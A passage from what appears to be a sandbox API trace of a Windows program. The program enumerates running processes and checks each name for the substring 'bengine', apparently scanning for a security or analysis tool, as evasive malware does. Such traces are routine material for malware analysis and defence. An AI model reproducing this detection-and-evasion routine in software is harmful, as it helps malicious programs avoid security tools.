lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.340] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f0d8 [0101.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f0d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.340] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.340] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.340] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.341] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f210 [0101.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356f210, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0101.341] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0101.341] StrStrIA (lpFirst="audiodg.exe", lpSrch="bengine") returned 0x0 [0101.341] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0101.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.342] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f048 [0101.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356f048, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0101.342] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0101.342] StrStrIA (lpFirst="sihost.exe", lpSrch="bengine") returned 0x0 [0101.342] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.343] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f120 [0101.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f120, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.344] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.344] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.344] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.345] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f228 [0101.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356f228, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.345] StrStrIA (lpFirst="taskhostw.exe", lpSrch="bengine") returned 0x0 [0101.345] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.346] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f270 [0101.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356f270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0101.346] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0101.346] StrStrIA (lpFirst="explorer.exe", lpSrch="bengine") returned 0x0 [0101.346] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0101.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.347] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f020 [0101.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357f020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0101.347] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0101.347] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="bengine") returned 0x0 [0101.347] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0101.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.348] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e5f0 [0101.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x357e5f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0101.349] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0101.349] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="bengine") returned 0x0 [0101.349] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0101.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.350] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357efe0 [0101.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357efe0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0101.350] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0101.350] StrStrIA (lpFirst="Memory Compression", lpSrch="bengine") returned 0x0 [0101.350] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0101.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.351] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357ee20 [0101.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357ee20, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0101.351] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0101.351] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="bengine") returned 0x0 [0101.351] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0101.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.352] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f0f0 [0101.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356f0f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0101.352] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0101.352] StrStrIA (lpFirst="SearchUI.exe", lpSrch="bengine") returned 0x0 [0101.352] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0101.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.354] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f080 [0101.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357f080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0101.354] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0101.354] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="bengine") returned 0x0 [0101.354] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.355] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f138 [0101.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356f138, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0101.355] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0101.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="bengine") returned 0x0 [0101.355] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0101.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.356] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f0c0 [0101.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356f0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0101.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0101.357] StrStrIA (lpFirst="pending.exe", lpSrch="bengine") returned 0x0 [0101.357] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0101.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.358] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e8e8 [0101.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x357e8e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0101.358] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0101.358] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="bengine") returned 0x0 [0101.358] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0101.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.359] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357ede0 [0101.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357ede0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0101.359] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0101.359] StrStrIA (lpFirst="swing prefer.exe", lpSrch="bengine") returned 0x0 [0101.359] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0101.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.360] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e5a0 [0101.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x357e5a0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0101.360] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0101.360] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="bengine") returned 0x0 [0101.360] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0101.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.361] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357efa0 [0101.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357efa0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0101.361] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0101.361] StrStrIA (lpFirst="nights-attending.exe", lpSrch="bengine") returned 0x0 [0101.361] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0101.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.362] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f198 [0101.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356f198, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0101.362] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0101.362] StrStrIA (lpFirst="installed.exe", lpSrch="bengine") returned 0x0 [0101.362] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0101.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.363] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e780 [0101.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x357e780, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0101.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0101.364] StrStrIA (lpFirst="references compounds.exe", lpSrch="bengine") returned 0x0 [0101.364] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0101.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.365] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ed00 [0101.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357ed00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0101.365] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0101.365] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="bengine") returned 0x0 [0101.365] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0101.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.366] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ed40 [0101.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357ed40, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0101.366] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0101.366] StrStrIA (lpFirst="registered try.exe", lpSrch="bengine") returned 0x0 [0101.366] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0101.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.367] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e5c8 [0101.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x357e5c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0101.367] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0101.367] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="bengine") returned 0x0 [0101.367] Process32NextW (in: 